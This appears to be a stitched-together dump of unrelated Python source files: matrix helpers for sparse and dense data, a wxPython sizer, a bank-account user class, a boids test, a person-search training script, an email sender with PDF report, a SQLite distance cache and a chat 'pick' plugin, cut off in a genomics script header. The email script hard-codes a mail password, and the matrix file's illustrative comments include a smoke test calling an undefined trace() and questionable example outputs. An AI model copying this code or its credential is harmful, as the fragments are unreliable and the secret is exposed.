if sp.isspmatrix(X) and sp.isspmatrix(Y):
return X * Y
elif sp.isspmatrix(X) or sp.isspmatrix(Y):
# avoid dense dot product with mixed factors
return sp.csr_matrix(X) * sp.csr_matrix(Y)
else:
return np.asmatrix(X) * np.asmatrix(Y)
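# Example (illustrative): representations may be mixed; a sparse/dense pair is
# promoted to CSR so the product is never formed densely:
#   dot(sp.csr_matrix(np.mat([[1, 0], [0, 2]])), np.mat([[3], [4]]))
#   -> sparse (2, 1) result with entries [3, 8]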
def multiply(X, Y):
"""
Compute element-wise multiplication of matrices :param:`X` and :param:`Y`.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
if sp.isspmatrix(X) and sp.isspmatrix(Y):
return X.multiply(Y)
elif sp.isspmatrix(X) or sp.isspmatrix(Y):
return _op_spmatrix(X, Y, np.multiply)
else:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
return np.multiply(np.mat(X), np.mat(Y))
def power(X, s):
"""
Compute matrix power of matrix :param:`X` for power :param:`s`.
:param X: Input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: Power.
:type s: `int`
"""
if sp.isspmatrix(X):
Y = X.tocsr()
eps = np.finfo(Y.data.dtype).eps if not 'int' in str(
Y.data.dtype) else 0
return sp.csr_matrix((np.power(Y.data + eps, s), Y.indices, Y.indptr), Y.shape)
else:
eps = np.finfo(X.dtype).eps if not 'int' in str(X.dtype) else 0
return np.power(X + eps, s)
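# Example (illustrative): machine epsilon is added before exponentiation so
# negative powers never divide by an exact zero:
#   power(np.mat([[4.0, 9.0]]), 0.5)  ->  approximately [[2.0, 3.0]]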
def sop(X, s=None, op=None):
"""
Compute scalar element wise operation of matrix :param:`X` and
scalar :param:`s`.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: Input scalar. If not specified, element wise operation of input
matrix is computed.
:type s: `float`
:param op: Operation to be performed.
:type op: `func`
"""
if sp.isspmatrix(X):
return _sop_spmatrix(X, s, op)
else:
return _sop_matrix(X, s, op)
def _sop_spmatrix(X, s=None, op=None):
"""
Compute sparse scalar element wise operation of matrix X and scalar :param:`s`.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
:param s: Input scalar. If not specified, element wise operation of input
matrix is computed.
:type s: `float`
:param op: Operation to be performed.
:type op: `func`
"""
R = X.copy().tocsr()
eps = np.finfo(R.dtype).eps if not 'int' in str(R.dtype) else 0
now = 0
for row in range(R.shape[0]):
upto = R.indptr[row + 1]
while now < upto:
R.data[now] = op(R.data[now] + eps, s) if s is not None else op(
R.data[now] + eps)
now += 1
return R
def _sop_matrix(X, s=None, op=None):
"""
Compute scalar element wise operation of matrix :param:`X` and scalar :param:`s`.
:param X: The input matrix.
:type X: :class:`numpy.matrix`
:param s: Input scalar. If not specified, element wise operation of input
matrix is computed.
:type s: `float`
:param op: Operation to be performed.
:type op: `func`
"""
eps = np.finfo(X.dtype).eps if not 'int' in str(X.dtype) else 0
return op(X + eps, s) if s is not None else op(X + eps)
def elop(X, Y, op):
"""
Compute element-wise operation of matrix :param:`X` and matrix :param:`Y`.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
try:
zp1 = op(0, 1) if sp.isspmatrix(X) else op(1, 0)
zp2 = op(0, 0)
zp = zp1 != 0 or zp2 != 0
    except Exception:
zp = 0
if sp.isspmatrix(X) or sp.isspmatrix(Y):
return _op_spmatrix(X, Y, op) if not zp else _op_matrix(X, Y, op)
else:
try:
X[X == 0] = np.finfo(X.dtype).eps
Y[Y == 0] = np.finfo(Y.dtype).eps
except ValueError:
return op(np.mat(X), np.mat(Y))
return op(np.mat(X), np.mat(Y))
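# Example (illustrative): division does not preserve zeros (op(0, 0) raises),
# so elop takes the dense path and eps-protects zero entries first:
#   elop(np.mat([[1.0, 0.0]]), np.mat([[2.0, 0.0]]), div)
#   -> [[0.5, 1.0]]  (the 0/0 entry becomes eps/eps = 1.0)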
def _op_spmatrix(X, Y, op):
"""
Compute sparse element-wise operation for operations preserving zeros.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
# distinction as op is not necessarily commutative
return __op_spmatrix(X, Y, op) if sp.isspmatrix(X) else __op_spmatrix(Y, X, op)
def __op_spmatrix(X, Y, op):
"""
Compute sparse element-wise operation for operations preserving zeros.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
:param Y: Second input matrix.
:type Y: :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
assert X.shape == Y.shape, "Matrices are not aligned."
eps = np.finfo(Y.dtype).eps if not 'int' in str(Y.dtype) else 0
Xx = X.tocsr()
r, c = Xx.nonzero()
R = op(Xx[r, c], Y[r, c] + eps)
R = np.array(R)
assert 1 in R.shape, "Data matrix in sparse should be rank-1."
R = R[0, :] if R.shape[0] == 1 else R[:, 0]
return sp.csr_matrix((R, Xx.indices, Xx.indptr), Xx.shape)
def _op_matrix(X, Y, op):
"""
Compute sparse element-wise operation for operations not preserving zeros.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
# operation is not necessarily commutative
assert X.shape == Y.shape, "Matrices are not aligned."
eps = np.finfo(Y.dtype).eps if not 'int' in str(Y.dtype) else 0
return np.mat([[op(X[i, j], Y[i, j] + eps) for j in range(X.shape[1])] for i in range(X.shape[0])])
def inf_norm(X):
"""
Infinity norm of a matrix (maximum absolute row sum).
:param X: Input matrix.
:type X: :class:`scipy.sparse.csr_matrix`, :class:`scipy.sparse.csc_matrix`
or :class:`numpy.matrix`
"""
if sp.isspmatrix_csr(X) or sp.isspmatrix_csc(X):
# avoid copying index and ptr arrays
abs_X = X.__class__(
(abs(X.data), X.indices, X.indptr), shape=X.shape)
return (abs_X * np.ones((X.shape[1]), dtype=X.dtype)).max()
elif sp.isspmatrix(X):
return (abs(X) * np.ones((X.shape[1]), dtype=X.dtype)).max()
else:
return nla.norm(np.asmatrix(X), float('inf'))
def norm(X, p="fro"):
"""
Compute entry-wise norms (! not induced/operator norms).
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param p: Order of the norm.
:type p: `str` or `float`
"""
assert 1 in X.shape or p != 2, "Computing entry-wise norms only."
if sp.isspmatrix(X):
fro = lambda X: sum(abs(x) ** 2 for x in X.data) ** (1. / 2)
inf = lambda X: abs(X).sum(
axis=1).max() if 1 not in X.shape else abs(X).max()
m_inf = lambda X: abs(X).sum(
axis=1).min() if 1 not in X.shape else abs(X).min()
one = lambda X: abs(X).sum(axis=0).max() if 1 not in X.shape else sum(
abs(x) ** p for x in X.data) ** (1. / p)
m_one = lambda X: abs(X).sum(axis=0).min() if 1 not in X.shape else sum(
abs(x) ** p for x in X.data) ** (1. / p)
v = {
"fro": fro,
"inf": inf,
"-inf": m_inf,
1: one,
-1: m_one,
}.get(p)
        return v(X) if v is not None else sum(abs(x) ** p for x in X.data) ** (1. / p)
else:
return nla.norm(np.mat(X), p)
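# Example (illustrative): entry-wise norms only; "fro" sums squared stored
# entries of a sparse argument:
#   norm(sp.csr_matrix([[3.0, 4.0]]), "fro")  ->  5.0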
def vstack(X, format=None, dtype=None):
"""
Stack sparse or dense matrices vertically (row wise).
:param X: Sequence of matrices with compatible shapes.
:type X: sequence of :class:`scipy.sparse` of format csr, csc, coo, bsr,
dok, lil, dia or :class:`numpy.matrix`
"""
if len([0 for x in X if not sp.isspmatrix(x)]) == 0:
# scipy.sparse bug
# return sp.vstack(X, format = X[0].getformat() if format is None else
# format, dtype = X[0].dtype if dtype is None else dtype)
return sp.vstack(X)
else:
return np.vstack(X)
def hstack(X, format=None, dtype=None):
"""
Stack sparse or dense matrices horizontally (column wise).
:param X: Sequence of matrices with compatible shapes.
:type X: sequence of :class:`scipy.sparse` of format csr, csc, coo, bsr,
dok, lil, dia or :class:`numpy.matrix`
"""
if len([0 for x in X if not sp.isspmatrix(x)]) == 0:
# scipy.sparse bug
# return sp.hstack(X, format = X[0].getformat() if format is None else
        # format, dtype = X[0].dtype if dtype is None else dtype)
return sp.hstack(X)
else:
return np.hstack(X)
def max(X, s):
"""
Compute element-wise max(x,s) assignment for sparse or dense matrix.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: the input scalar.
:type s: `float`
"""
if sp.isspmatrix(X):
Y = X.tocsr()
DD = Y.data.copy()
DD = np.maximum(DD, s)
return sp.csr_matrix((DD, Y.indices, Y.indptr), Y.shape)
else:
return np.maximum(X, s)
def min(X, s):
"""
Compute element-wise min(x,s) assignment for sparse or dense matrix.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: the input scalar.
:type s: `float`
"""
if sp.isspmatrix(X):
Y = X.tocsr()
DD = Y.data.copy()
DD = np.minimum(DD, s)
return sp.csr_matrix((DD, Y.indices, Y.indptr), Y.shape)
else:
return np.minimum(X, s)
def count(X, s):
"""
Return the number of occurrences of element :param:`s` in sparse or
dense matrix X.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: the input scalar.
:type s: `float`
"""
if sp.isspmatrix(X):
return sum([1 for x in X.data if s == x])
else:
return sum([1 for r in X.tolist() for x in r if s == x])
def nz_data(X):
"""
Return list of nonzero elements from X (! data, not indices).
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
return X.data.tolist()
else:
return [x for r in X.tolist() for x in r if x != 0]
def choose(n, k):
"""
    A fast way to calculate binomial coefficients C(n, k). It is about 10 times
    faster than scipy.misc.comb for exact answers.
:param n: Index of binomial coefficient.
:type n: `int`
:param k: Index of binomial coefficient.
:type k: `int`
"""
if 0 <= k <= n:
ntok = 1
ktok = 1
for t in range(1, min(k, n - k) + 1):
ntok *= n
ktok *= t
n -= 1
return ntok // ktok
else:
return 0
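# Minimal smoke test added for illustration; every helper is defined in this
# module and the matrices are made up for the example.
if __name__ == '__main__':
    A = sp.csr_matrix(np.mat([[1.0, 0.0], [2.0, 3.0]]))
    B = np.mat([[1.0, 2.0], [3.0, 4.0]])
    print(trace(A))               # 4.0
    print(dot(A, B).todense())    # [[1. 2.] [11. 16.]]
    print(max(A, 2.0).todense())  # stored entries clamped from below at 2.0
    print(choose(5, 2))           # 10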
| nilq/baby-python | python |
import wx
class SimpleSizer(wx.BoxSizer):
def __init__(self, first, second, gap=0, leftHeavy=False, rightHeavy=False, topHeavy=False, bottomHeavy=False):
self.first = first
self.second = second
horizontal = leftHeavy or rightHeavy
vertical = topHeavy or bottomHeavy
assert horizontal or vertical
assert not (horizontal and vertical)
firstHeavy = leftHeavy or topHeavy
secondHeavy = rightHeavy or bottomHeavy
wx.BoxSizer.__init__(self, wx.VERTICAL if vertical else wx.HORIZONTAL)
if first: self.Add(first, 1 if firstHeavy else 0, wx.EXPAND)
if gap: self.AddSpacer(gap)
if second: self.Add(second, 1 if secondHeavy else 0, wx.EXPAND)
@classmethod
def new(cls, code, *aa, **kk):
assert 3 == len(code)
# "heaviness" : Left, Right, Top, Bottom,
# Vertical (Top + Bottom), or
# Horizontal (Left + Right)
assert code[0] in "LRTBVH"
# "visibility": visible or hidden
assert code[1] in "VH" # 1st visible or hidden
assert code[2] in "VH" # 2nd visible or hidden
s = cls(*aa,
leftHeavy=(code[0] in "LH"),
rightHeavy=(code[0] in "RH"),
topHeavy=(code[0] in "TV"),
bottomHeavy=(code[0] in "BV"),
**kk)
if not "V" == code[1]: s.SetFirstVisible(False)
if not "V" == code[2]: s.SetSecondVisible(False)
return s
def Install(self, parent):
parent.SetSizer(self)
def GetFirst(self):
# return self.GetItem(0).GetWindow()
return self.first
def GetSecond(self):
# return self.GetItem(1).GetWindow()
return self.second
def IsFirstVisible(self):
return self.IsShown(0)
def IsSecondVisible(self):
return self.IsShown(1)
def SetFirstVisible(self, on=True, recursive=False, refresh=True):
if on: self.Show(0, recursive=recursive)
else: self.Hide(0, recursive=recursive)
if on: self.GetFirst().SetFocus()
if refresh: self.Layout()
def SetSecondVisible(self, on=True, recursive=False, refresh=True):
if on: self.Show(1, recursive=recursive)
else: self.Hide(1, recursive=recursive)
if on: self.GetSecond().SetFocus()
if refresh: self.Layout()
def ToggleFirstVisible(self, recursive=False, refresh=True):
self.SetFirstVisible(not self.IsFirstVisible(), recursive, refresh)
def ToggleSecondVisible(self, recursive=False, refresh=True):
self.SetSecondVisible(not self.IsSecondVisible(), recursive, refresh)
def ToggleVisible(self, recursive=False):
self.SetFirstVisible(not self.IsFirstVisible(), recursive, False)
self.SetSecondVisible(not self.IsSecondVisible(), recursive, False)
self.Layout()
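# Usage sketch (illustrative; the frame and panels are made up for the demo):
if __name__ == '__main__':
    app = wx.App()
    frame = wx.Frame(None, title="SimpleSizer demo")
    top, bottom = wx.Panel(frame), wx.Panel(frame)
    # "TVV": top pane gets the extra space, both panes start visible
    SimpleSizer.new("TVV", top, bottom, gap=4).Install(frame)
    frame.Show()
    app.MainLoop()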
| nilq/baby-python | python |
from bank_account import BankAccount
class User(object):
def __init__(self, username, email_address):
self.name = username # and we use the values passed in to set the name attribute
self.email = email_address # and the email attribute
self.accounts = {
'default': BankAccount(int_rate=0.02, balance=0)
}
# adding the deposit method
def make_deposit(self, amount, account='default'): # takes an argument that is the amount of the deposit
self.accounts[account].deposit(amount) # the specific user's account increases by the amount of the value received
return self
def make_withdrawal(self, amount, account='default'): # have this method decrease the user's balance by the amount specified
self.accounts[account].withdraw(amount)
return self
def display_user_balance(self, account='default'): # have this method print the user's name and account balance to the terminal
# eg. "User: Guido van Rossum, Balance: $150
print(f'User: {self.name}')
self.accounts[account].display_account_info()
#BONUS:
def transfer_money(self, other_user, amount): # have this method decrease the user's balance by the amount and add that amount to other other_user's balance
self.make_withdrawal(amount)
other_user.make_deposit(amount)
return self
# SENSEI BONUS
def add_account(self, name, account):
self.accounts[name] = account
return self
if __name__ == '__main__':
from faker import Faker
faker = Faker()
users = []
for _ in range(3):
profile = faker.simple_profile()
users.append(User(profile['username'], profile['mail']))
users[0].make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(400).display_user_balance()
users[1].make_deposit(400).make_deposit(300).make_withdrawal(200).make_withdrawal(100).display_user_balance()
users[2].make_deposit(400).make_withdrawal(100).make_withdrawal(100).make_withdrawal(100).display_user_balance()
users[0].transfer_money(users[1], 100).display_user_balance()
users[1].display_user_balance()
| nilq/baby-python | python |
from boids.code.boids import Boids
import pytest
from os.path import dirname, split, join
import yaml
import numpy as np
config = yaml.safe_load(open(split(dirname(__file__))[0] + '/code/config.yaml'))
def test_bad_boids_regression():
'''
test compares a single position update of the refactored code
to the initial bad boids implementation.
'''
    regression_data = yaml.safe_load(open(join(dirname(__file__), 'fixture.yaml')))
flock = Boids(size = 50)
flock.positions = np.asarray(regression_data["before"][0:2])
flock.velocities = np.asarray(regression_data["before"][2:])
flock.update(config['params'])
# check that positions match
assert np.all(abs(np.asarray(regression_data["after"][0:2]) - flock.positions) < 1e-1)
# check that velocities match
assert np.all(abs(np.asarray(regression_data["after"][2:]) - flock.velocities) < 1e-1)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""Top-level package for appliapps."""
__author__ = """Lars Malmstroem"""
__email__ = '[email protected]'
__version__ = '0.1.0'
| nilq/baby-python | python |
import socket
from datetime import datetime
import os.path as osp
import huepy as hue
import numpy as np
import torch
from torch.backends import cudnn
from torch.utils.tensorboard import SummaryWriter
import sys
sys.path.append('./')
from configs import args_faster_rcnn_hoim
from lib.datasets import get_data_loader
from lib.model.faster_rcnn_hoim import get_hoim_model
from lib.utils.misc import Nestedspace, resume_from_checkpoint, \
get_optimizer, get_lr_scheduler
from lib.utils.distributed import init_distributed_mode, is_main_process
from lib.utils.trainer import get_trainer
from lib.utils.serialization import mkdir_if_missing
def main(args):
if args.distributed:
init_distributed_mode(args)
device = torch.device(args.device)
cudnn.benchmark = False
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if is_main_process():
current_time = datetime.now().strftime('%b%d_%H-%M-%S')
args.path = osp.join(
args.path, current_time + '_' + socket.gethostname())
mkdir_if_missing(args.path)
print(hue.info(hue.bold(hue.lightgreen(
'Working directory: {}'.format(args.path)))))
if args.train.use_tfboard:
tfboard = SummaryWriter(log_dir=args.path)
args.export_to_json(osp.join(args.path, 'args.json'))
else:
tfboard = None
train_loader = get_data_loader(args, train=True)
model = get_hoim_model(pretrained_backbone=True,
num_features=args.num_features, num_pids=args.num_pids,
num_cq_size=args.num_cq_size, num_bg_size=args.num_bg_size,
oim_momentum=args.train.oim_momentum, oim_scalar=args.oim_scalar,
min_size=args.train.min_size, max_size=args.train.max_size,
anchor_scales=(args.anchor_scales,), anchor_ratios=(
args.anchor_ratios,),
# RPN parameters
rpn_pre_nms_top_n_train=args.train.rpn_pre_nms_top_n,
rpn_post_nms_top_n_train=args.train.rpn_post_nms_top_n,
# rpn_pre_nms_top_n_test=args.test.rpn_pre_nms_top_n,
# rpn_post_nms_top_n_test=args.test.rpn_post_nms_top_n,
rpn_nms_thresh=args.train.rpn_nms_thresh,
rpn_fg_iou_thresh=args.train.rpn_positive_overlap,
rpn_bg_iou_thresh=args.train.rpn_negative_overlap,
rpn_batch_size_per_image=args.train.rpn_batch_size,
rpn_positive_fraction=args.train.rpn_fg_fraction,
# Box parameters
box_score_thresh=args.train.fg_thresh,
# box_nms_thresh=args.test.nms, # inference only
box_detections_per_img=args.train.rpn_post_nms_top_n, # use all
box_fg_iou_thresh=args.train.bg_thresh_hi,
box_bg_iou_thresh=args.train.bg_thresh_lo,
box_batch_size_per_image=args.train.rcnn_batch_size,
box_positive_fraction=args.train.fg_fraction, # for proposals
bbox_reg_weights=args.train.box_regression_weights,
)
model.to(device)
optimizer = get_optimizer(args, model)
lr_scheduler = get_lr_scheduler(args, optimizer)
if args.apex:
from apex import amp
model, optimizer = amp.initialize(model, optimizer, opt_level='O1')
model_without_ddp = model
if args.distributed:
if args.apex:
from apex.parallel import DistributedDataParallel, convert_syncbn_model
model = convert_syncbn_model(model)
model = DistributedDataParallel(model)
else:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[args.local_rank], find_unused_parameters=True)
model_without_ddp = model.module
if args.resume is not None:
args, model_without_ddp, optimizer, lr_scheduler = resume_from_checkpoint(
args, model_without_ddp, optimizer, lr_scheduler)
trainer = get_trainer(args, model, model_without_ddp, train_loader,
optimizer, lr_scheduler, device, tfboard)
trainer.run(train_loader, max_epochs=args.train.epochs)
if is_main_process():
tfboard.close()
if __name__ == '__main__':
arg_parser = args_faster_rcnn_hoim()
args = arg_parser.parse_args(namespace=Nestedspace())
main(args)
| nilq/baby-python | python |
import smtplib
import os
import mimetypes
from email import encoders
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from fpdf import FPDF
import time
# Function that builds and sends an email message with optional attachments
def send_email(addr_to, msg_subj, msg_text, files):
addr_from = "[email protected]" # Отправитель
password = "dishiestduke" # Пароль
msg = MIMEMultipart() # Создаем сообщение
msg['From'] = addr_from
msg['To'] = addr_to
msg['Subject'] = msg_subj
    body = msg_text  # message text
    msg.attach(MIMEText(body, 'plain'))  # add the text body to the message
process_attachement(msg, files)
    server = smtplib.SMTP('smtp.mail.ru', 25)  # do not touch this!!! it only works with mail.ru
server.starttls()
server.login(addr_from,password)
server.send_message(msg)
server.quit()
# Function that walks the list of attachments (files or directories)
def process_attachement(msg, files):
for f in files:
if os.path.isfile(f):
attach_file(msg,f)
elif os.path.exists(f):
dir = os.listdir(f)
for file in dir:
attach_file(msg,f+"/"+file)
# Function that attaches a single file to the message
def attach_file(msg, filepath):
filename = os.path.basename(filepath)
ctype, encoding = mimetypes.guess_type(filepath)
if ctype is None or encoding is not None:
ctype = 'application/octet-stream'
maintype, subtype = ctype.split('/', 1)
with open(filepath, 'rb') as fp:
file = MIMEBase(maintype, subtype)
file.set_payload(fp.read())
fp.close()
encoders.encode_base64(file)
file.add_header('Content-Disposition', 'attachment', filename=filename)
msg.attach(file)
def pdf_write(image):
pdf = FPDF()
pdf.add_page()
pdf.set_font("Arial", size=12)
center="Violation report"
pdf.cell(200, 10, txt=center, ln=1, align="C")
pdf.image(image, x=10, y=20, w=100)
    pdf.ln(85)  # move 85 units down the page
name = 'Lack of a helmet or building vest'
pdf.cell(200, 10, txt=name, ln=1)
vremy=str(time.asctime())
pdf.cell(200,10,txt=vremy,ln=1)
surname='Responsible: Sidorov P.A.'
pdf.cell(200,10,txt=surname,ln=1)
city='Nizhny Novgorod,Minin Street'
pdf.cell(200,10,txt=city,ln=1)
pdf.set_line_width(1)
pdf.set_draw_color(0, 0, 0)
pdf.line(20, 115, 100, 115)
pdf.output("Output/pdf/Accountability.pdf")
| nilq/baby-python | python |
import os
from typing import Union
import sqlite3
from sqlite3 import Error
from coordinates import Coordinates
class SqlHandler:
def __init__(self):
self._database = "data.db"
self._connection = None
self._cursor = None
self.connected = False
def _create_new_database(self) -> None:
try:
self._connect_to_sqlite3_database()
self._create_cities_table()
self._create_distances_table()
self._connection.commit()
self._connection.close()
except Error as error:
raise error
def _create_cities_table(self) -> None:
sql_table_cities_create = """
CREATE TABLE cities (
id integer PRIMARY KEY,
city text NOT NULL,
longitude REAL,
latitude REAL
)
"""
self._cursor.execute(sql_table_cities_create)
def _create_distances_table(self) -> None:
sql_table_distances_create = """
CREATE TABLE distances (
city_1_id integer,
city_2_id integer,
distance REAL,
duration REAL
)
"""
self._cursor.execute(sql_table_distances_create)
def _get_city_id(self, city: str) -> int:
sql_string = "SELECT id FROM cities WHERE city = ?"
self._cursor.execute(sql_string, (city,))
answer = self._cursor.fetchone()
if answer is None:
raise ValueError('City not known.')
return answer[0]
def _connect_to_sqlite3_database(self) -> None:
try:
self._connection = sqlite3.connect(self._database)
self._cursor = self._connection.cursor()
self.connected = True
except Error as error:
raise error
def connect(self) -> None:
if self.connected:
return
if not os.path.isfile(self._database):
self._create_new_database()
self._connect_to_sqlite3_database()
def close(self) -> None:
if self.connected:
self._connection.close()
self.connected = False
def _connect_if_not_connected(self):
if not self.connected:
self.connect()
def get_coordinates_from_city(self, city: str) -> Coordinates:
self._connect_if_not_connected()
sql_string = "SELECT longitude, latitude FROM cities WHERE city = ?"
self._cursor.execute(sql_string, (city,))
answer = self._cursor.fetchone()
coordinates = Coordinates()
if answer:
coordinates.longitude = answer[0]
coordinates.latitude = answer[1]
return coordinates
def set_coordinates_from_city(self, city: str, longitude: int, latitude: int) -> None:
self._connect_if_not_connected()
sql_string = "INSERT INTO cities (city, longitude, latitude) VALUES (?, ?, ?)"
self._cursor.execute(sql_string, (city, longitude, latitude,))
self._connection.commit()
def set_distance_duration(self, city_1: str, city_2: str, distance: float, duration: float) -> None:
self._connect_if_not_connected()
city_1_id = self._get_city_id(city_1)
city_2_id = self._get_city_id(city_2)
sql_string = "INSERT INTO distances (city_1_id, city_2_id, distance, duration) " \
"VALUES (?, ?, ?, ?)"
self._cursor.execute(sql_string, (city_1_id, city_2_id, distance, duration,))
self._connection.commit()
def get_value(self, city_1: str, city_2: str, option: str) -> Union[float, None]:
self._connect_if_not_connected()
if option not in ['distance', 'duration']:
raise ValueError('Only "distance" and "duration" allowed.')
city_1_id = self._get_city_id(city_1)
city_2_id = self._get_city_id(city_2)
sql_string = f"SELECT {option} FROM distances WHERE " \
"(city_1_id = ? AND city_2_id = ?)" \
" OR (city_1_id = ? AND city_2_id = ?)"
self._cursor.execute(sql_string, (city_1_id, city_2_id, city_2_id, city_1_id,))
answer = self._cursor.fetchone()
if answer is None:
return None
return answer[0]
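if __name__ == '__main__':
    # Illustrative smoke test: coordinates and distance are made-up values,
    # and rerunning it inserts duplicate rows into data.db.
    handler = SqlHandler()
    handler.set_coordinates_from_city('Berlin', 13.405, 52.52)
    handler.set_coordinates_from_city('Hamburg', 9.9937, 53.5511)
    handler.set_distance_duration('Berlin', 'Hamburg', 289.0, 11160.0)
    print(handler.get_value('Berlin', 'Hamburg', 'distance'))  # 289.0
    handler.close()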
| nilq/baby-python | python |
# -*- coding: utf8 -*-
__description__ = "Pick a random item from a given list of items. The trigger is 'pick'."
__version__ = "1.0"
__author__ = "Dingo"
from core.plugin import Plugin
import re
import random
async def pick(command):
message = " ".join(command.args)
message = message.replace(" and say:", ":")
try:
pickstring, saystring = re.split(r": ", message, 1)
except ValueError:
pickstring = message
saystring = None
prepicks = [x.strip() for x in pickstring.split(",")]
picks = []
re_range = re.compile(r"^(-?\d+)\.\.(-?\d+)(;\d+)?$")
for pick in prepicks:
rangecheck = re_range.search(pick)
if rangecheck:
try:
if rangecheck.group(1).startswith("0") or rangecheck.group(1).startswith("-0"):
fill_string = "%%0%ii" % len(rangecheck.group(1))
else:
fill_string = "%i"
start = int(rangecheck.group(1))
stop = int(rangecheck.group(2))
if rangecheck.group(3):
step = int(rangecheck.group(3)[1:])
else:
step = 1
except ValueError:
picks.append(pick)
continue
if start > stop or abs((stop - start) / step) > 1024:
picks.append(pick)
else:
picks.extend(fill_string % i for i in range(start, stop + 1, step))
else:
picks.append(pick)
absurdity = random.randint(1, 100)
if absurdity > 80:
texts = (
"The sources from beyond the grave say: %s",
"Our computer simulation predicts %s! No warranty expressed or implied.",
"Don't you worry about %s, let me worry about blank.",
"%s? %S?? You're not looking at the big picture!",
"Give me %s or give me death!",
"Amy! I mean: %s!",
"Once again, the conservative, sandwich-heavy %s pays off for the hungry investor.",
"%s: style and comfort for the discriminating crotch.",
"%s sounds interesting! No, that other word. Tedious!",
"Good man. Nixon's pro-war and pro-%s.",
"Doug & Carrie, Doug & Carrie, Doug & Carrie, Doug & Carrie! %s! %s! %s! %s!",
# "%u, %s is make-believe, like elves, gremlins, and eskimos.",
"Weaseling out of %s is important to learn. It's what separates us from the animals ... except the weasel.",
"Is %s too violent for children? Most people would say, 'No, of course not. Don't be ridiculous.' But one woman says, 'Yes.' %u.",
"The dark side clouds everything. Impossible to see the future is... But I'm sure %s is in it!",
"I spent 90% of my money on women and %s. The rest I wasted.",
"As God once put it: let there be %s!",
# "%u, today is your day, %s is waiting, so get on your way.",
"I've got four words for you: I! LOVE! THIS! %S! YEEEEEEEEEEEAAAS!!!",
"Remember, a Jedi's strength flows from the Force. But beware. Anger, fear, %s. The dark side they are.",
"Choose %s! Respect my authoritah!!",
"%s: it's a privilege, not a right.",
"Fear leads to Anger. Anger leads to Hate. Hate leads to %s.",
"Drugs are for losers, and %s is for losers with big weird eyebrows.",
# "I heard %s makes you stupid. | <%u> No, I'm... doesn't!",
"%s. Hell, it's about time!",
)
else:
texts = (
"The computer simulation recommends %s.",
"Result: %s",
"The answer is %s.",
"Optimal choice: %s",
)
if saystring:
if any(mark in saystring for mark in ("%s", "%S", "%n", "%N")):
text = saystring
else:
text = "%s " + saystring
else:
if len(picks) == 1 and picks[0].lower() in (
"flower",
"nose",
"fight",
"a fight",
"pocket",
"lock",
):
onlypick = picks[0].lower()
if onlypick == "flower":
text = "%u picks a flower. As its sweet smell fills the channel, all chatter get +3 for saving throws on net splits."
elif onlypick == "nose":
text = "Eeeew! %u, do that somewhere private!"
elif onlypick in ("fight", "a fight"):
text = "%u starts a brawl in another channel. Only the quick reaction of fellow %c chatters saves the weakling from a gruesome fate."
elif onlypick == "pocket":
text = "Despite being amazingly clumsy, %u manages to pick the pocket of an innocent bystander. A used handkerchief is the reward."
elif onlypick == "lock":
text = "Lockpick required."
else:
text = random.choice(texts)
chosen = random.choice(picks)
if picks != [""]:
msg = text
# msg = msg.replace("%u", event.user)
# msg = msg.replace("%c", str(event.channel))
msg = msg.replace("%S", "**" + chosen.upper() + "**")
msg = msg.replace("%s", "**" + chosen + "**")
msg = msg.replace("%N", chosen.upper())
msg = msg.replace("%n", chosen)
else:
return None
await plugin.respond_message(command, msg, delay=200)
plugin = Plugin("pick", "General", "Plugin to provide a simple, randomized !pick")
plugin.add_command("pick", pick, "aids you in those really important life decisions")
| nilq/baby-python | python |
#! /usr/bin/env python
# -*- coding:UTF-8 -*-
"""
------------------------------------------------------------------------------------------
It is used to get the longest mRNA of each gene and to filter the pep and cds results by a minimum length;
usage: python xx.py -i GFF -f FASTA -g out.gff -o out.fa -s species_short_name -l 30
newly revised by Frank on Feb 22nd 2020.
newly revised by Frank on Aug 15th 2020,
a. solve phase coding problem;
b. solve translate table problem.
